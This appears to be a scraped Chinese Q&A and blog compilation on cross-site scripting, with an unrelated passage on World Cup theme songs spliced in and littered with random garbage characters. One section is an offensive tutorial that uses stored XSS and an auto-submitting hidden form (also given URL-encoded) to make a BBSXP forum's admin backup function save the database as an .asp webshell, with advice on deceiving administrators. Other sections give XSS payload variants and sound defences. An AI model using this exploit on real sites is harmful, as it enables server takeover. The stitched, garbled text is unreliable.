XSS是什么
1、XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。
2、恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
3、XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。
4、另一类则是来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当要渗透一个站点,自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。
xss什么意思
xss
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
网站xss高危处理?
这不是。。discuz站点?
如果这的确是discuz的系统的话,去discuz官网下载最新版即可,discuz的更新效率还是比较高的,漏洞也比较少
如果是自己写的话,不妨对传入变量做一下过滤处理
用str_replace对、、'、"这几个符号进行转译,xss一般就不会生效了
什么是XSS攻击
什么是XSS攻击XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常忽略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是老技术,但是其思路希望对大家有帮助。 [编辑本段]如何寻找XSS漏洞就个人而言,我把XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。另一类则是来来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。
然后利用下面的技术得到一个shell. [编辑本段]如何利用传统的跨站利用方式一般都是攻击者先构造一个跨站网页,然后在另一空间里放一个收集cookie的页面,接着结合其它技术让用户打开跨站页面以盗取用户的cookie,以便进一步的攻击。个人认为这种方式太过于落后,对于弊端大家可能都知道,因为即便你收集到了cookie你也未必能进一步渗透进去,多数的cookie里面的密码都是经过加密的,如果想要cookie欺骗的话,同样也要受到其它的条件的限约。而本文提出的另一种思路,则从一定程度上解决上述的问题。对于个人而言,比较成熟的方法是通过跨站构造一个表单,表单的内容则为利用程序的备份功能或者加管理员等功能得到一个高权限。下面我将详细的介绍这种技术。 [编辑本段]来自内部的跨站攻击寻找跨站漏洞
如果有代码的话比较好办,我们主要看代码里对用户输入的地方和变量有没有做长度和对”〈”,”〉”,”;”,”’”等字符是否做过滤。还有要注意的是对于标签的闭合,像测试QQ群跨站漏洞的时候,你在标题处输入〈script〉alert(‘test’)〈/script〉,代码是不会被执行的,因为在源代码里,有其它的标签未闭合,如少了一个〈/script〉,这个时候,你只要闭合一个〈/script〉,代码就会执行,如:你在标题处输入〈/script〉〈script〉alert(‘test’)〈/script〉,这样就可以弹出一个test的框。
如何利用
我先以BBSXP为例,过程已做成动画,详情可见光盘中的动画。我举BBSXP中其中两个比较好用的跨站漏洞点为例.
a.先注册一个普通用户,我这里注册的用户是linzi.然后我们在个人签名里写入:
c.然后发个贴子,可以结合其它技术欺骗管理员浏览发的贴子。
d.因为是测试,所以我们以管理员身份登陆,然后打开贴子,我们会发现,linzi已经变成了社区区长工,如图一所示
除此之外我们只要在个人签名里输入
同样发个贴子等,只要管理员打开了,就会加了一个扩展名为asp (有空格)的上传扩展,这个时候,你只要上传一个newmm.asp (有空格)就可以得到一个shell.
上面的攻击多多少少有点局限性,虽然可以得到shell,但是隐蔽性不太好,因为签名
处受到了长度的限制,不能超过255个字符。我们可以结合flash跨站实现更为隐蔽的
攻击,对于flash木马的制作,下面见哥们丰初的介绍。
再利用如下:
修改一下个人头像的url,输入代码如下:
再接着欺骗管理员打开你的资料或者浏览你的贴子,当管理员打开后,会在后台自动加个php扩展名的后辍,因为bbsxp在个人头像url里过滤了空格,%,所以我们只能加个不包括空格的其它扩展,当然你也可以加个shtml的扩展,有了它你就可以用来查看源代码,然后进一步攻击。 [编辑本段]来自外部的跨站攻击有的时候,当我们对于目标程序找不到可以利用的跨站点,这个时候我们可以利用可以从外部入手,利用我们要拿下的是它的论坛,论坛的安全性做的很好,但其留言板却存在跨站漏洞,这个时候我们可以在留言板里写入跨站语句,跨站语句为以表单的方式向论坛提交提升权限的语句,如上面的bbsxp加asp 扩展的语句。当然我们可利用后台的备份功能直接得到一个shell。
例:先上传一个文件linzi.txt,内容如下:
〈body onload="javascript:document.forms[0].submit()"〉〈form
action=" http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post"〉〈input value="database/bbsxp.mdb" name="yl" 〉〈input value="database/shit.asp" name="bf" 〉〈/body〉〈/html〉
上面的代码是把论坛的数据库备份为shit.asp,留言板存在跨站点如下:
http://127.0.0.1/bbsxp/page2.asp?username=
我们构造备份跨站语句如下:
http://127.0.0.1/bbsxp/page2.asp?username=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%66%6F%72%6D%73%5B%30%5D%2E%73%75%62%6D%69%74%28%29%22%3E%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%2F%62%62%73%78%70%2F%61%64%6D%69%6E%5F%66%73%6F%2E%61%73%70%3F%6D%65%6E%75%3D%62%61%6B%62%66%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%62%62%73%78%70%2E%6D%64%62%22%20%6E%61%6D%65%3D%22%79%6C%22%20%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%73%68%69%74%2E%61%73%70%22%20%6E%61%6D%65%3D%22%62%66%22%20%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E
或者构造跨站语句,利用iframe打开一个0大小的linzi.txt。
当管理员打开后,会自动备份得到一个shell. [编辑本段]XSS与其它技术的结合从上面的实例,我们可以知道,如何欺骗管理打开是一个很重要的步骤,对于欺骗打开,除了社会工程学外,我们可以结合其它的技术,如sql injection.当我们渗透一个网站之时,主站mssql注入漏洞,权限为public,这个时候我们利用update构造跨站语句,如用iframe打开一个上面的备份得到shell的跨站语句等,同样,我们可以在社会工程学时,利用QQ的其它跨站漏洞等等。
总是对于欺骗也是一门艺术,具体怎么利用,大家就发挥自己的想象力吧!
好一个欺骗也是一门艺术,不管是在生活中还是在网络中。生活中难免有些事情不能讲真话,这时采用适当的方法使得我们的假话当作真话讲,这就靠欺骗的艺术了。
xss注入漏洞产生的原因?xss注入过程步骤是什么?防范xss注入的方法有哪些
对于的用户输入中出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识,以后在开发的时候,每当有用户输入的内容时,都要加倍小心。请记住两条原则:过滤输入和转义输出。
一、什么是XSS
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。
在WEB2.0时代,强调的是互动,使得用户输入信息的机会大增,在这个情况下,我们作为开发者,在开发的时候,要提高警惕。
二、XSS攻击的主要途径
XSS攻击方法只是利用HTML的属性,作各种的尝试,找出注入的方法。现在对三种主要方式进行分析。
第一种:对普通的用户输入,页面原样内容输出。
打开http://go.ent.163.com/goproducttest/test.jsp(限公司IP),输 入:scriptalert(‘xss’)/script, JS脚本顺利执行。当攻击者找到这种方法后,就可以传播这种链接格式的链接 (http://go.ent.163.com/goproducttest/test.jsp?key=JSCODE)如:http: //go.ent.163.com/goproducttest/test.jsp?key=scriptalert(‘xss’) lt;/script,并对JSCODE做适当伪装,如:
http://go.ent.163.com/goproducttest/test.jsp?key=%3c%73%63%72%69%70 %74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c%2f%73%63%72%69%70%74%3e,当其 它用户当点此链接的时候,JS就运行了,造成的后果会很严重,如跳去一个有木马的页面、取得登陆用户的COOKIE等。
第二种:在代码区里有用户输入的内容
原则就是,代码区中,绝对不应含有用户输入的东西。
第三种:允许用户输入HTML标签的页面。
用户可以提交一些自定义的HTML代码,这种情况是最危险的。因为,IE浏览器默认采用的是UNICODE编码,HTML编码可以用ASCII方式来写,又可以使用”/”连接16进制字符串来写,使得过滤变得异常复杂,如下面的四个例子,都可以在IE中运行。
1,直接使用JS脚本。
img src=”javascript:alert(‘xss’)” /
2,对JS脚本进行转码。
img src=”javascript:alert(‘xss’)” /
3,利用标签的触发条件插入代码并进行转码。
img onerror=”alert(‘xss’)” /
4,使用16进制来写(可以在傲游中运行)
img STYLE=”background-image: /75/72/6c/28/6a/61/76/61/73/63/72/69/70/74/3a/61/6c/65/72/74/28/27/58/53/53/27/29/29″
以上写法等于img STYLE=”background-image: url(javascript:alert(‘XSS’))”
三、XSS攻击解决办法
请记住两条原则:过滤输入和转义输出。
具体执行的方式有以下几点:
第一、在输入方面对所有用户提交内容进行可靠的输入验证,提交内容包括URL、查询关键字、http头、post数据等
第二、在输出方面,在用户输内容中使用XMP标签。标签内的内容不会解释,直接显示。
第三、严格执行字符输入字数控制。
四、在脚本执行区中,应绝无用户输入。
有届世界杯(好像是98年)主题曲叫什么,闭幕式上的,敲铁桶
1990-2002年历届世界杯主题曲
回眸世界杯赛场上的英雄和惊心动魄的对决,曾经与它们一起唤起亿万球迷热情的历届世界杯主题曲却很少有人提及。查阅众多世界杯相关资料,关于世界杯主题曲,自1990年起才有确凿的记录。现将近年来世界杯决赛的主题音乐和演唱者资料整理陈列,供大家在看球之余在脑海里回温一下那些振奋人心的旋律。
1990:“意大利之夏” (UN'ESTATE ITALIANA)(1990年意大利世界杯主题曲)
英语版本名称为:To Be Number One
5k,NT#L]sU%m
演唱者:吉奥吉-莫罗德(Giorgio Moroder)和吉娜-娜尼尼(Gianna Nannini)
“意大利之夏”或许是最成功的世界杯主题曲,至今仍被资深球迷和歌迷所津津乐道。这是首悠扬动听,又振奋人心的歌曲,意大利人将亚平宁半岛上的海风和足球王国对足球运动的理解糅合成迷人的音乐。这首歌有数个版本,原唱录音版较舒缓传统;现场演唱版则加入更多摇滚节奏;因为作曲的是意大利电子乐大师吉奥吉,也有过节奏强劲的混音版。超级球迷香港天王谭咏麟也曾将此歌改成粤语版本的“理想与和平”。两位原唱者都是意大利最著名的流行乐大师,并且此歌也是两人合作写成的,英语版由吉奥吉演唱。
吉奥吉-莫罗德9A$_[ W[~
意大利最著名的电子音乐先锋,是20世纪70年代迪斯科音乐发展中的标志人物。这位1940年4月26日生于奥提西的意大利人,曾经赢得过3座奥斯卡奖和4次金球奖。他有着传奇式的经历,所涉及的领域几乎都带给他巨大的荣誉。他曾经是位吉他手,19岁组建了自己的乐队Covers,出没于欧洲的夜总会中。70年代起,他专心于音乐制作,1969年他推出自己制作的处女单曲“瞧一瞧”(Looky Looky),并与合作伙伴佩特-贝洛特(Pete Bellotte)组成了制作组合。他们的辉煌来自于发掘了曾经当和声歌手的多娜-桑莫(Donna Summer),由此缔造了一种对迪斯科影响深远的音乐现象。70年代后期,莫罗德开始接触电影配乐。并在整个80年代倾心于此工作。他在电影方面最著名的作品是由汤姆-克鲁斯主演的影片《壮志雄心》的主题曲“带走我的呼吸”(Take my breath away)。该曲不仅雄踞英美各大排行榜之首,并摘得奥斯卡最佳歌曲奖。
w1KQI(h x
Az? tY#ugT
吉娜-娜尼尼
e[K:`r
吉娜1956年6月14日生于意大利迷人的图斯卡尼省。她从小就显现出音乐天赋,在她身上所蕴涵的自然、反叛和自信使她19岁就离家来到米兰闯荡。1976年,她推出同名首张专辑。1979年她做出冒险决定,只身闯荡美国探询摇滚乐根源。虽然她经历了种种失望,但还是深深地发掘出自己的摇滚根源。经过挫折与努力,吉娜成为世界级明星,频繁在欧洲成功举行巡回演唱会,不断与众多著名音乐人有过合作。1989年她同艾多拉多-班那托合作写词了1990年世界杯赛的主题曲“意大利之夏”的歌词,并与吉奥吉在米兰的开幕式携手歌唱
下载:http://bin2216.goalchina.net/images/upload/2004/12/28/000608.mp3
1994:“荣耀之地”(Gloryland)(1994年美国世界杯主题曲)
演唱者:达利尔-豪(Daryl Hall)#{Ce1k~6x2d
美国一直是足球运动的处女地,把世界杯主办权交到他们手里似乎是个错误的选择,主题曲也变得黯淡。这首“荣耀之地”虽然有个响亮的名字,但是英雄主义色彩在这首歌中荡然无存。“荣耀之地”在音乐风格上更接近于民谣与流行摇滚乐的结合,很有些美国西部荒原的苍茫感。1994年作者兼主唱达利尔创作了此歌,并邀请福音曲演唱组合“黑暗之声”(Sounds of blackness)协助录制。由于作品缺乏对足球运动的共鸣,很快淹没在人们的记忆之中。1994年的世界杯合辑中收录的其他大牌艺人的作品倒是要比主题曲精彩得多。
K K,AUXgu
达利尔-豪
,H ~ r%Ya]}
达利尔-豪是美国70和80年代知名组合“豪与奥兹双人组”(Hall and Oates)的成员之一。他1946年10月11日出生,原名Daryl Franklin Hohl。来自费城的达利尔在坦普尔大学结识了后来的伙伴约翰-奥兹(John Oates)。他们几经分合,最后在汤米-莫托拉(Tommy Mottola,后来也是玛莉亚凯莉的经理人)的运作下,签约亚特兰大唱片公司。1972年推出首张专辑《纯粹的奥兹》(Whole Oates)。1984年他们成为历史上排名最高的民谣二人组,同年组合解散,各自发展,1988年为了专辑《Ooh Yeah!》重组。至今他仍有新专辑推出。
下载: http://www.lanierspeedway.com/gloryland.mp3
1998:“我踢球你介意吗”(La Cour des Grands)和“生命之杯”(La Copa De La Vida)
从1998年起,世界杯赛的主题曲不再仅限于一首,而且开始灌录世界杯官方专辑唱片。1998年的《Allez! Ola! Ole! 》中就收录了15首代表参赛各国的足球歌曲。官方主题歌为“我踢球你介意吗”和“生命之杯”。!g9T|G?sd:o
1998:“我踢球你介意吗”(法语:La Cour des Grands,英语:Do you mind if I play)(1998年法国世界杯主题曲1)@ y/ie^do b$vP
0R*\XA[o0N 演唱者:尤索-恩多(Youssou N'Dour )& 阿克塞拉-瑞德(Axelle Red)*h7F!m$vr
#C%S9}U/tr8~+K p~
“我踢球你介意吗”是首轻快的歌曲,带着浓烈的热带情调和欢快的吟唱风格。演唱者都不是法国人,歌曲没有明显的法国特点,可能也正应和了世界杯融合交流的主题,并符合法国人喜好出人意料的性格。但很多人认为并不好听。p e[OAwR l7j V
尤索-恩多
-JK^u) 尤索-恩多是目前世界乐坛最著名的世界音乐歌手之一,这位嗓音独特的塞内加尔人生于1959年10月。美国著名乐评杂志《滚石》是这样评价他的:“如果有哪位来自第三世界的艺人在全球影响力上能和鲍伯-马里(Bob Marley)相提并论的话,那只有尤索-恩多。他的嗓音独特,古老非洲的历史似乎都凝结在他的声线之中。”
阿克塞拉-瑞德J%y9`#}M(v
1968年生于比利时的海塞尔特,3岁起学习舞蹈并接触音乐,从莫扎特到南部灵歌,她都有所涉猎。1983年用英语录制了第一张单曲,因为英语最适合她想唱的这类歌曲。在Virgin唱片的支持下,她继续女性灵歌风格的探索。1993年她的第一张专辑《Sans Plus Attendre》终于为她不仅在比利时,更在法语地区赢得了声誉。1998年6月她同尤索-恩多在世界杯开幕式上向法兰西体育场内8万球迷和全球数亿观众演唱了这首充满欢快节奏和热带韵律的歌曲。jNKZ*uD/k
e@+qC T+c([q E4^
“生命之杯”(La Copa De La Vida)(西班牙语) \zO%u'UU/PP/~y
演唱者:瑞奇-马汀(Ricky Martin)
瑞奇-马汀是世界级偶像歌手,并引领着拉丁音乐浪潮。该歌曲选自他1998年专辑《让爱继续》(Vuelve),并获得全球30个国家单曲排行的冠军,也是1998年法国世界杯的另一首主题曲。“生命之杯” 在世界杯之后也传播甚广,成为很多足球节目用来烘托气氛的第一选用曲目。歌曲中的鼓乐节奏和号角奏鸣都颇为煽情。
t\(v eg P/y
瑞奇-马汀1971年12月24日生于波多黎各,6岁起开始接拍电视广告,很快对表演产生浓厚兴趣。12岁时,瑞奇-马汀加入了少年偶像团体Menudo,这是一支拉丁乐历史上最受欢迎的组合。17岁的马汀在离开Menudo后,决定放下明星身份,重新走入学校完成他最后的高中学业。毕业后,他毅然来到美国纽约。以个人姿态进军歌坛的瑞奇-马汀,1991年推出了首张同名专辑,获得巨大成功,并在全球许多国家掀起了一股拉丁乐狂潮。1994年,瑞奇-马汀参演了电视连续剧《急诊室的故事》,这部在美国ABC电视台收视率颇高的肥皂剧使瑞奇的知名度再次得到了空前提高。1996年,让瑞奇-马汀走红全球的专辑《A Medio Vivir》发行,其中收录的歌曲呈现多元化风貌,收录有法国9周冠军曲“Maria”。令瑞奇走向世界的歌曲“生命之杯”(La Copa De La Vida / The Cup Of Life)收录在大碟《Vuelve》中,他以西班牙文唱出火热的气氛。
下载:http://www.nhyz.org/...gsong/pop2/The%20cup%20of%20life(LA%20COPA%20DE%20VIDA).mp3(西班牙语版 )
http://www.jl2sy.cn/xssq/zqly/w_cup_anthem_98.mp3
2002年日韩世界杯主题歌
2002年世界杯音乐的选择早早已经确定。“风暴”担纲全球主题曲,日韩新锐歌手组成“日韩之声”演唱组共同演绎日韩版主题曲“让我们走到一起”,另一首官方主题曲——纯音乐的“足球圣歌”以电子音乐风格,为新世纪世界杯进行时尚代言。同时,索尼音乐再次负责发行《2002年世界杯官方专辑》。
“风暴”(Boom)(2002年日韩世界杯主题歌)6G~%m2c]un
演唱者:阿纳斯塔西娅(Anastacia)
!O)c.e \G+U0l$Kj
阿纳斯塔西娅的歌声和形象的差距令人难以置信,靓丽的偶像外型和深沉浑厚的“爵士乐”嗓音给人的视听觉冲击强烈。“风暴”曲调简洁、节奏强劲,流行的曲风给人异域感觉,和“生命之杯” 相比它少了些火般热情,多了份紧迫感强劲的冲击。+kf5k1?"X
w t`:r+_ IT@
阿纳斯塔西娅原名Anastacia Newkirk,1973年9月17日出生于美国芝加哥,父亲是酒店歌手,母亲是纽约百老汇的演员。她14岁时父母离异,随母亲来到纽约,并进入艺术学校。阿纳斯塔西娅1999年参加MTV的新秀选拔赛后加入乐坛。签约Sony之后于2000年发行了个人首张专辑《并非它类》(Not That Kind)获得巨大成功,销量逾200万。2002年发行第二张专辑《自然的怪诞》(Freak of Nature),当前的单曲“Paid My Dues”在全球热播不断。阿纳斯塔西娅的演唱和舞蹈风格以随性自由为特点,金发白肤的抢眼外形之下蕴藏的却是一把“拥有纯粹的黑人灵魂的声线”。去年11月1日,国际足联最终确定阿纳斯塔西娅来演唱2002年韩日世界杯主题歌“风暴”。
c-U8[0Ae/{T
“足球圣歌”(Anthem)(2002世界杯官方主题曲) AAJI7O)jV#^ c M
~2IM[yfi ]N'E
演唱者:范吉利斯(Vangelis)]w0jl M!n1m2~.}Q\I
:iEtI:VZ
范吉利斯的配乐以华丽见长,我们最熟悉的是将气氛烘托到极致的“火的战车”。这首主题曲中有两个版本,一首电子乐版本的作品是由芬兰音乐家JS16混音完成,兼具东方色彩和电子乐风情。另一首交响乐版传统、大气,作为专辑的结尾恰倒好处。
范吉利斯:当代最成功的电子乐作曲家、新世纪音乐大师。1943年出生于希腊,从小就显露非同一般的音乐才华,然而他拒绝接受钢琴课,并坚持自学成才。1981年荣获奥斯卡电影最佳配乐奖以《火的战车》,从此蜚声国际,电影的主题歌甚至进入美国流行榜十大,其后引发了一系列的电影音乐创作。1992年,范吉利斯获颁法国最富盛誉的艺术文学骑士勋章。他的最新作品是为美国宇航局的“2001火星奥德赛”任务创作的主题音乐“Mythodea”。A `6WT5N8iex
“让我们走到一起”(Let's get together now)(2002年世界杯日韩主题歌)
K;K3rYOzi]F
演唱者:VOICES OF KOREA/JAPAN~]H$a#K!nF
"K[A,NS6SL
日本:化学超男子(Chemistry)、Sowelu
韩国:褐眼男子(Brown Eyes) 、朴正铉(Lena Park)) iP~S(Cr*`
“让我们走到一起”是首格外清新悠扬的歌曲,它以日本流行歌曲独有的轻松和流畅,在众多世界杯歌曲中卓尔不群,它更象一首沉浸于幸福的爱情歌曲或是励志歌曲。6人的超大组合主要因为两国合办的原因,在音乐演绎上除了俊男配靓女,实力派对唱将的缘故外,也未见有更多的亮点。此歌并未收录进“新索音乐”在中国内地发行的官方专辑中。
\u W@
“化学超男子”n dYcNh Y
全日本最当红的“化学超男子”由堂珍嘉邦和川-要两名成员组成。两位出身平民的歌手经过严格选秀,以健康强壮的外型和肺活量十足的歌声赢得著名制作人松尾洁的青睐,并以 “化学超男子”之名顺利出道,他们三张单曲“梦的碎片”、“梦想起飞”和“你走你的路”都夺得ORICON单曲榜冠军,“梦的碎片”更创下超过150万张的销量。去年11月7日,首张专辑《化学本色》在日本发行, 不仅立刻登上ORICON专辑榜当日冠军, 同时首日出货量即高达150万张,使他们成为日本最走红的演唱组合之一。4syR6Y(_]m
2w1czW s
年仅19岁的日本及爱尔兰混血的Sowelu,不仅拥有令人惊艳的美貌,她充满灵魂感的歌唱实力更让她在正式出道前就可以参与这次世界杯的国际合作。制作人松尾洁非常赏识Sowelu的优异天赋,在今年初发行的由松尾洁监制及选曲的合辑《流畅》(SMOOTH)中,就收录了Sowelu演唱的一首难度较高的名曲“穿越我心”(Across my heart)。Sowelu4月17日正式出道,推出首张专辑《美丽梦想者》(Beautiful Dreamer)。/rd]+Et b eGJ
“褐眼男子”(rN~:a`g _
“褐眼男子”是去年韩国最受注目的新人。由身兼写歌、写词、制作人的尹建和多才多艺的主唱那易(NaEar)所组成的。首支单曲“一年后”MTV在韩国一鸣惊人,长达7分钟的情节,更是请到了国际级导演王家卫执导。该组合并不经常出现在媒体面前,潜心做音乐。MkW,a s8V!TC
3?+dnN[]r5p
朴正炫z `9xD1Zv
G@oQ I"F Y
朴正炫被称为韩国世界级美声的唯一代表。1998年崛起于韩国乐坛的她,首张专辑《菁华剪影》(piece)大获好评让她成为全韩偶像风潮狂炽中,唯一凭演唱实力创造轰动的唱将。她可以放弃很多演唱技巧,而用最熟悉、最自然的嗓音表现各种类型的歌曲,引来韩国众多重量级艺人的钦佩,并乐于和她合作。
下载:http://www.i-vec.com/msc_mp3/club/eng-song/Boom.mp3
http://www.gmw.cn/03zhuanti/tiyu/Fifa2002/sound/2002.mp3[/URL]n Qwc7NKJ j
http://ent.zj.chinavnet.com/[/url]《2002世界杯足球赛日韩指定专辑》/Let's%20Get%20Together%20Now.mp3
Xss是什么意思
xss:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
如何正确防御xss攻击
XSS攻击通常是指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。
一、HttpOnly防止劫取Cookie
HttpOnly最早由微软提出,至今已经成为一个标准。浏览器将禁止页面的Javascript访问带有HttpOnly属性的Cookie。目前主流浏览器都支持,HttpOnly解决是XSS后的Cookie支持攻击。
我们来看下百度有没有使用。
未登录时的Cookie信息
可以看到,所有Cookie都没有设置HttpOnly,现在我登录下
发现在个叫BDUSS的Cookie设置了HttpOnly。可以猜测此Cookie用于认证。
下面我用PHP来实现下:
?php
header("Set-Cookie: cookie1=test1;");
header("Set-Cookie: cookie2=test2;httponly",false);
setcookie('cookie3','test3',NULL,NULL,NULL,NULL,false);
setcookie('cookie4','test4',NULL,NULL,NULL,NULL,true);
?
script
alert(document.cookie);
/script
js只能读到没有HttpOnly标识的Cookie
二、输入检查
输入检查一般是检查用户输入的数据中是否包含一些特殊字符,如、、'、"等,如果发现存在特殊字符,则将这些字符过滤或者编码。
例如网站注册经常用户名只允许字母和数字的组合,或者邮箱电话,我们会在前端用js进行检查,但在服务器端代码必须再次检查一次,因为客户端的检查很容易绕过。
网上有许多开源的“XSS Filter”的实现,但是它们应该选择性的使用,因为它们对特殊字符的过滤可能并非数据的本意。比如一款php的lib_filter类:
$filter = new lib_filter();
echo $filter-go('1+11');
它输出的是1,这大大歪曲了数据的语义,因此什么情况应该对哪些字符进行过滤应该适情况而定。
三、输出检查
大多人都知道输入需要做检查,但却忽略了输出检查。
1、在HTML标签中输出
如代码:
?php
$a = "scriptalert(1);/script";
$b = "img src=# onerror=alert(2) /";
?
div?=$b?/div
a href="#"?=$a?/a
这样客户端受到xss攻击,解决方法就是对变量使用htmlEncode,php中的函数是htmlentities
?php
$a = "scriptalert(1);/script";
$b = "img src=# onerror=alert(2) /";
?
div?=htmlentities($b)?/div
a href="#"?=htmlentities($a)?/a
2、在HTML属性中输出
div id="div" name ="$var"/div
这种情况防御也是使用htmlEncode
在owasp-php中实现:
$immune_htmlattr = array(',', '.', '-', '_');
$this-htmlEntityCodec-encode($this-immune_htmlattr, "\"script123123;/script\"");
3、在script标签中输出
如代码:
?php
$c = "1;alert(3)";
?
script type="text/javascript"
var c = ?=$c?;
/script
这样xss又生效了。首先js变量输出一定要在引号内,但是如果我$c = "\"abc;alert(123);//",你会发现放引号中都没用,自带的函数都不能很好的满足。这时只能使用一个更加严格的JavascriptEncode函数来保证安全——除数字、字母外的所有字符,都使用十六进制"\xHH"的方式进行编码。这里我采用开源的owasp-php方法来实现
$immune = array("");
echo $this-javascriptCodec-encode($immune, "\"abc;alert(123);//");
最后输出\x22abc\x3Balert\x28123\x29\x3B\x2F\x2F
4、在事件中输出
a href="#" onclick="funcA('$var')" test/a
可能攻击方法
a href="#" onclick="funcA('');alter(/xss/;//')"test/a
这个其实就是写在script中,所以跟3防御相同
5、在css中输出
在owasp-php中实现:
$immune = array("");
$this-cssCodec-encode($immune, 'background:expression(window.x?0:(alert(/XSS/),window.x=1));');
6、在地址中输出
先确保变量是否是"http"开头,然后再使用js的encodeURI或encodeURIComponent方法。
在owasp-php中实现:
$instance = ESAPI::getEncoder();
$instance-encodeForURL(‘url’);
四、处理富文体
就像我写这篇博客,我几乎可以随意输入任意字符,插入图片,插入代码,还可以设置样式。这个时要做的就是设置好白名单,严格控制标签。能自定义 css件麻烦事,因此最好使用成熟的开源框架来检查。php可以使用htmlpurify
五、防御DOM Based XSS
DOM Based XSS是从javascript中输出数据到HTML页面里。
script
var x = "$var";
document.write("a href='"+x+"'test/a");
/script
按照三中输出检查用到的防御方法,在x赋值时进行编码,但是当document.write输出数据到HTML时,浏览器重新渲染了页面,会将x进行解码,因此这么一来,相当于没有编码,而产生xss。
防御方法:首先,还是应该做输出防御编码的,但后面如果是输出到事件或脚本,则要再做一次javascriptEncode编码,如果是输出到HTML内容或属性,则要做一次HTMLEncode。
会触发DOM Based XSS的地方有很多:
document.write()、document.writeln()、xxx.innerHTML=、xxx.outerHTML=、innerHTML.replace、document.attachEvent()、window.attachEvent()、document.location.replace()、document.location.assign()